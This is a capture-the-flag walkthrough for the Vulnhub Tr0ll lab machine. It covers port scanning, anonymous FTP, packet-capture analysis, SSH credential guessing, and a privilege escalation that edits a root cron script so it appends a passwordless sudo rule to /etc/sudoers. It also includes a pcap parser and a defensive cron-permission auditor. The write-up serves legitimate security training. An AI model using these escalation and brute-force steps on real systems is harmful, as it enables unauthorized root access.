Vulnhub Tr0ll Box Penetration Walkthrough
Objective: read the contents of the Proof.txt file under /root
Target Discovery
Scan the subnet with arp-scan to find the target host
┌──(root㉿kali)-[/home/kali]
└─# arp-scan 192.168.120.0/24
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ab:50:b1, IPv4: 192.168.120.160
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.120.1 00:50:56:c0:00:08 (Unknown)
192.168.120.2 00:50:56:f6:91:bf (Unknown)
192.168.120.168 00:0c:29:51:59:a0 (Unknown)
192.168.120.254 00:50:56:eb:e4:1c (Unknown)
6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.862 seconds (137.49 hosts/sec). 4 responded
The target host IP should be 192.168.120.168
Information Gathering
Port Scanning
Run a full port scan against the target with nmap
┌──(root㉿kali)-[/home/kali]
└─# nmap -sS -p- -sV -A 192.168.120.168 --min-rate=1000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-29 08:15 EDT
Nmap scan report for 192.168.120.168
Host is up (0.0010s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 1000 0 8068 Aug 10 2014 lol.pcap [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.120.160
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 600
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
| 2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
| 256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_ 256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry
|_/secret
MAC Address: 00:0C:29:51:59:A0 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 1.05 ms 192.168.120.168
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.82 seconds
The results show that the target hosts a website and runs an FTP server that allows anonymous access!!!
Anonymous FTP Access
Logging in to FTP anonymously shows only a single file, and only the current directory is accessible
┌──(root㉿kali)-[/home/kali]
└─# ftp 192.168.120.168
Connected to 192.168.120.168.
220 (vsFTPd 3.0.2)
Name (192.168.120.168:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||64128|).
150 Here comes the directory listing.
-rwxrwxrwx 1 1000 0 8068 Aug 10 2014 lol.pcap
226 Directory send OK.
ftp> pwd
Remote directory: /
ftp> get lol.pcap
local: lol.pcap remote: lol.pcap
229 Entering Extended Passive Mode (|||43867|).
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
100% |***********************************************************************************************| 8068 25.19 KiB/s 00:00 ETA
226 Transfer complete.
8068 bytes received in 00:00 (25.09 KiB/s)
ftp> quit
221 Goodbye.
It turns out to be a packet capture, and a file transfer can be seen inside it


strings can also be used to read the file directly and pull out its plain-text content:
┌──(root㉿kali)-[/home/kali/Templates]
└─# strings lol.pcap
Linux 3.12-kali1-486
Dumpcap 1.10.2 (SVN Rev 51934 from /trunk-1.10)
eth0
host 10.0.0.6
Linux 3.12-kali1-486
220 (vsFTPd 3.0.2)
"USER anonymous
331 Please specify the password.
PASS password
230 Login successful.
SYST
215 UNIX Type: L8
PORT 10,0,0,12,173,198
200 PORT command successful. Consider using PASV.
LIST
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 147 Aug 10 00:38 secret_stuff.txt
226 Directory send OK.
TYPE I
W200 Switching to Binary mode.
PORT 10,0,0,12,202,172
g> @
W200 PORT command successful. Consider using PASV.
RETR secret_stuff.txt
W150 Opening BINARY mode data connection for secret_stuff.txt (147 bytes).
WWell, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P
Sucks, you were so close... gotta TRY HARDER!
W226 Transfer complete.
TYPE A
O200 Switching to ASCII mode.
{PORT 10,0,0,12,172,74
O200 PORT command successful. Consider using PASV.
{LIST
O150 Here comes the directory listing.
O-rw-r--r-- 1 0 0 147 Aug 10 00:38 secret_stuff.txt
O226 Directory send OK.
{QUIT
221 Goodbye.
Counters provided by dumpcap
The transferred file and its contents are visible here as well.
Directory Scanning
Scan for directories with dirsearch
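strings only shows the text fragments; to see which command fetched which file, the capture has to be parsed by stream. As an added example (not from the original write-up), here is a small pure-Python parser that walks a classic pcap, extracts TCP payloads, and reconstructs the FTP control channel plus the file sent over the active-mode data channel. The capture bytes are constructed inline (client 10.0.0.12, server 10.0.0.6, as in the capture) and the file content is assumed to be the one shown above.

```python
import struct

# Constructed sample: a minimal active-mode FTP session (client 10.0.0.12, server
# 10.0.0.6, as in the capture above) written out as a classic little-endian pcap.
def _frame(src, dst, sport, dport, payload):
    eth = b"\x00" * 12 + b"\x08\x00"                           # Ethernet II, type IPv4
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 0x50, 0x18, 8192, 0, 0)  # PSH|ACK
    frame = eth + ip + tcp + payload
    return struct.pack("<IIII", 0, 0, len(frame), len(frame)) + frame    # pcap record header

SECRET = b"Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P\n"
SAMPLE_PCAP = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1) + b"".join([
    _frame("10.0.0.6", "10.0.0.12", 21, 40000, b"220 (vsFTPd 3.0.2)\r\n"),
    _frame("10.0.0.12", "10.0.0.6", 40000, 21, b"USER anonymous\r\n"),
    _frame("10.0.0.12", "10.0.0.6", 40000, 21, b"PORT 10,0,0,12,202,172\r\n"),
    _frame("10.0.0.12", "10.0.0.6", 40000, 21, b"RETR secret_stuff.txt\r\n"),
    _frame("10.0.0.6", "10.0.0.12", 20, 202 * 256 + 172, SECRET),   # data from server port 20
    _frame("10.0.0.12", "10.0.0.6", 40000, 21, b"QUIT\r\n"),
])

def tcp_payloads(pcap):
    """Walk the pcap records and yield (src, sport, dst, dport, payload) per TCP segment."""
    end = "<" if struct.unpack_from("<I", pcap, 0)[0] == 0xA1B2C3D4 else ">"
    off = 24                                                   # skip the 24-byte global header
    while off + 16 <= len(pcap):
        incl = struct.unpack_from(end + "IIII", pcap, off)[2]
        frame, off = pcap[off + 16:off + 16 + incl], off + 16 + incl
        if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
            continue                                           # IPv4 over Ethernet, TCP only
        ip = frame[14:14 + struct.unpack_from("!H", frame, 16)[0]]
        tcp = ip[(frame[14] & 0x0F) * 4:]
        sport, dport = struct.unpack_from("!HH", tcp, 0)
        payload = tcp[(tcp[12] >> 4) * 4:]
        if payload:
            yield (".".join(map(str, ip[12:16])), sport,
                   ".".join(map(str, ip[16:20])), dport, payload)

def reconstruct_ftp(pcap):
    """Return (control-channel lines, {name: bytes}) for an active-mode FTP session."""
    lines, files, pending = [], {}, None
    for src, sport, dst, dport, payload in tcp_payloads(pcap):
        if 21 in (sport, dport):                               # control channel
            line = payload.decode("ascii", "replace").strip()
            lines.append(("C> " if dport == 21 else "S> ") + line)
            if line.startswith("RETR "):
                pending = line[5:]                             # next data-channel bytes belong to it
        elif sport == 20 and pending:                          # active-mode data channel
            files[pending] = files.get(pending, b"") + payload
    return lines, files
```

Passive-mode sessions would need the PASV reply's port to be tracked instead of a fixed server port 20.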
┌──(root㉿kali)-[/home/kali]
└─# dirsearch -u 192.168.120.168
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/kali/reports/_192.168.120.168/_25-03-29_08-32-36.txt
Target: http://192.168.120.168/
[08:32:37] Starting:
...
[08:33:46] 200 - 31B - /robots.txt
[08:33:47] 301 - 318B - /secret -> http://192.168.120.168/secret/
[08:33:47] 200 - 37B - /secret/
...
Task Completed
Two pages and one directory are accessible
Default page
The default page is just an image, with no hidden information

/robots.txt page

/secret page (the /secret/ directory redirect lands here too)

/sup3rs3cr3tdirlol
There are no other leads at this point, so review what has been collected: the file transferred in the capture mentioned sup3rs3cr3tdirlol, which by leetspeak convention looks like a path name, so try accessing it on the website.
It turns out to be a directory containing an ELF file:


It mentions an address, 0x0856BF, which could be one of two things:
- a URL path
- a memory address, possibly related to an overflow vulnerability
/0x0856BF directory
Trying the URL path first reveals two directories
The good_luck directory contains a text file:

It holds some Linux commands and unknown strings
The this_folder_contains_the_password directory contains a password file:

SSH Brute Force
Combining the two files obtained above with the information so far, that password can only be an SSH password, but the username is unknown, so crackmapexec can be used to brute-force it:
Testing shows the target's SSH has an anti-brute-force mechanism that allows only 6 attempts, and the password still could not be found. But the directory name /this_folder_contains_the_password/ says the password is inside it, so the only information left is the filename; testing with it yields a working account:


Privilege Escalation
Testing finds no privileged commands: there is no sudo or SUID escalation path, and scheduled tasks cannot be viewed.
There is also an SSH session time limit:
...
Broadcast Message from root@trol
(somewhere) at 7:55 ...
TIMES UP LOL!
Connection to 192.168.120.168 closed by remote host.
Connection to 192.168.120.168 closed.
Log in again and check whether the cron log can be viewed
overflow@troll:/$ find / -name cronlog 2>/dev/null
/var/log/cronlog
overflow@troll:/$ cat /var/log/cronlog
*/2 * * * * cleaner.py
A cleaner.py script is executed, so the approach is clear: find the cleaner file and modify its contents; if it runs as a privileged user, that gives a route to escalation:
overflow@troll:/$ find / -name cleaner.py 2>/dev/null
/lib/log/cleaner.py
overflow@troll:/$ cat /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
    os.system('rm -r /tmp/* ')
except:
    sys.exit()
The file was found, and it runs a system command directly
So modify that command to grant full sudo rights, and escalate:
$ vim /lib/log/cleaner.py
$ cat /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
    os.system('echo "overflow ALL=(ALL)NOPASSWD: ALL" >> /etc/sudoers')
except:
    sys.exit()
After waiting a while, a root shell is obtained:
$ sudo -l
sudo: unable to resolve host troll
Matching Defaults entries for overflow on troll:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User overflow may run the following commands on troll:
(ALL) NOPASSWD: ALL
$ sudo /bin/bash
sudo: unable to resolve host troll
root@troll:/# id
uid=0(root) gid=0(root) groups=0(root)
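The escalation above works because a root cron job runs a script that an unprivileged user can edit. As an added example, not part of the original write-up, here is a Python audit that resolves the script named in a crontab line and reports whether it, or its directory, is writable by non-root users; SEARCH_DIRS and the self_check() temp-file scenario are assumptions made for this demo.

```python
import os
import stat
import tempfile

# Directories a bare script name in a cron entry (like "cleaner.py" in the cronlog
# above) is looked up in. Assumed for this example; adjust to the host's cron PATH.
SEARCH_DIRS = ("/lib/log", "/usr/local/sbin", "/usr/local/bin", "/usr/sbin", "/usr/bin", "/sbin", "/bin")

def resolve_script(command, search_dirs=SEARCH_DIRS):
    """Return the path of the script a cron command names, or None if it is not found."""
    if os.path.isabs(command):
        return command if os.path.exists(command) else None
    for d in search_dirs:
        candidate = os.path.join(d, command)
        if os.path.exists(candidate):
            return candidate
    return None

def audit_cron_line(cron_line, search_dirs=SEARCH_DIRS):
    """Audit one root crontab line (5 schedule fields + command); returns a list of findings."""
    fields = cron_line.split()
    if not fields or fields[0].startswith("#") or len(fields) < 6:
        return []
    path = resolve_script(fields[5], search_dirs)
    if path is None:
        return [f"{fields[5]}: script not found in search dirs"]
    findings, st = [], os.stat(path)
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):       # anyone in group/others can edit it
        findings.append(f"{path}: writable by group/others ({stat.filemode(st.st_mode)})")
    if st.st_uid != 0:                                    # root runs a file it does not own
        findings.append(f"{path}: owned by uid {st.st_uid}, not root")
    parent = os.stat(os.path.dirname(path))
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        findings.append(f"{os.path.dirname(path)}: world-writable directory without sticky bit")
    return findings

def audit_crontab(text, search_dirs=SEARCH_DIRS):
    """Audit every line of a crontab or cronlog dump."""
    return [f for line in text.splitlines() for f in audit_cron_line(line, search_dirs)]

def self_check():
    """Constructed scenario: the same cron line against a 0777 and then a 0755 cleaner.py."""
    d = tempfile.mkdtemp()
    path = os.path.join(d, "cleaner.py")
    with open(path, "w") as fh:
        fh.write("#!/usr/bin/env python\n")
    os.chmod(path, 0o777)
    loose = audit_crontab("*/2 * * * * cleaner.py", (d,))
    os.chmod(path, 0o755)
    tight = audit_crontab("*/2 * * * * cleaner.py", (d,))
    return loose, tight
```

Run audit_crontab() over the real root crontab and cron.d files; a "writable by group/others" finding on a root-scheduled script is exactly the condition exploited above.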
Getting the Flag
Go to the root directory, then find the file and read it:
root@troll:/# cd /root
root@troll:/root# ls
proof.txt
root@troll:/root# cat proof.txt
Good job, you did it!
702a8c18d29c6f3ca0d99ef5712bfbdc